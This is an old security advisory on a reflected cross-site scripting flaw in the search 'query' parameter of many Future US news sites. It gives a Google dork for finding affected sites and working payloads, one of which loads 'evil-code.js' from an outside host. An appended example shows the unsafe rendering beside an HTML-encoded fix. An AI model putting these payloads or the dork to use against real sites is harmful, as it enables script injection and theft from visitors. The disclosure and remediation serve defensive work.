` NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+===================================================================================================================+
+ Copyright 2008 - Copyright 2008 Future US //Cross-site scripting (XSS) Remote Java Execution +
+===================================================================================================================+
Author(s): Ivan Sanchez
Product: Copyright 2008 Future US
http://www.futureus-inc.com/
http://www.dailyradar.com/
Date: 16/01/2009
Many domains are affected:
---------------------------
MovieBlips - Your daily movie news
ShowHype - Biggest stories, best fans
TVBlips - For TV aficionados only
42Blips - For science fiction fans
ComicsBlips - Excelsior! Comics news galore!
TotalFilm - Welcome to the movies!
BallHype - Best stories, biggest fans
ActionSportsBlips - Surf, Skate, Ski, Snowboard
BikeRadar - The world is for riding
MMABlips - News to fight for
RacingBlips - News built for speed
CyclingNews - The world centre of cycling
WallStreetBlips - Show me the money
BeltwayBlips - All politics, all the time
EarthBlips - Re-imagine the planet
and many more...
The flaw is exploited through the query string: put XSS code or a reference to external JavaScript code into the search text box and it is then reflected in the query string,
or put the code directly in the query string.
GOOGLE DORKS:
------------
intext:"Copyright 2008 Future US"
Parameter Affected:
-------------------
query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E
query="><script>alert(/CCC/)</script>&t=advanced&s=0&d=0&start=60
query="></a><script>alert(1);</script>
Example url:
http://domain/search/?query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E
Remediation:
------------
Validate the input.
`
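The remediation above, shown as an added example that is not part of the original advisory and not the affected site's code: a search box that reflects `query` into an HTML attribute, first concatenated raw and then validated and HTML-encoded. The template, function names and 200-character limit are assumptions; the payload is one of the advisory's test strings and `example.test` is a placeholder host.

```javascript
// Added example: reflected search term in an HTML attribute, raw vs. encoded.
// Template, names and limits are assumptions, not the affected site's code.

// Vulnerable pattern: the raw query value is concatenated into value="...".
function renderSearchBoxUnsafe(query) {
  return '<input type="text" name="query" value="' + query + '">';
}

// Encode every character that can close an attribute value or open a tag.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Input validation: take one value, drop control characters, bound the length.
// This narrows the input; the output encoding is what neutralises the markup.
function normalizeQuery(raw) {
  const value = Array.isArray(raw) ? raw[0] : raw; // repeated ?query= may arrive as an array
  return String(value ?? '').replace(/[\u0000-\u001f\u007f]/g, '').slice(0, 200);
}

function renderSearchBoxSafe(rawQuery) {
  return '<input type="text" name="query" value="' + escapeHtml(normalizeQuery(rawQuery)) + '">';
}

// Extract the decoded parameter the way a server-side framework would.
function queryFromUrl(url) {
  return new URL(url).searchParams.get('query') ?? '';
}

// Constructed request: advisory payload, placeholder host.
const sampleUrl = 'http://example.test/search/?query=%22%3E%3C/a%3E%3Cscript%3Ealert(1);%3C/script%3E';
const sampleQuery = queryFromUrl(sampleUrl);

console.log('unsafe:', renderSearchBoxUnsafe(sampleQuery)); // attribute is closed, script tag is live
console.log('safe:  ', renderSearchBoxSafe(sampleQuery));   // payload stays inside value="..."
```

The same encoding has to be applied wherever the term is echoed elsewhere on the results page (headings, pagination links), using the encoder that matches each output context.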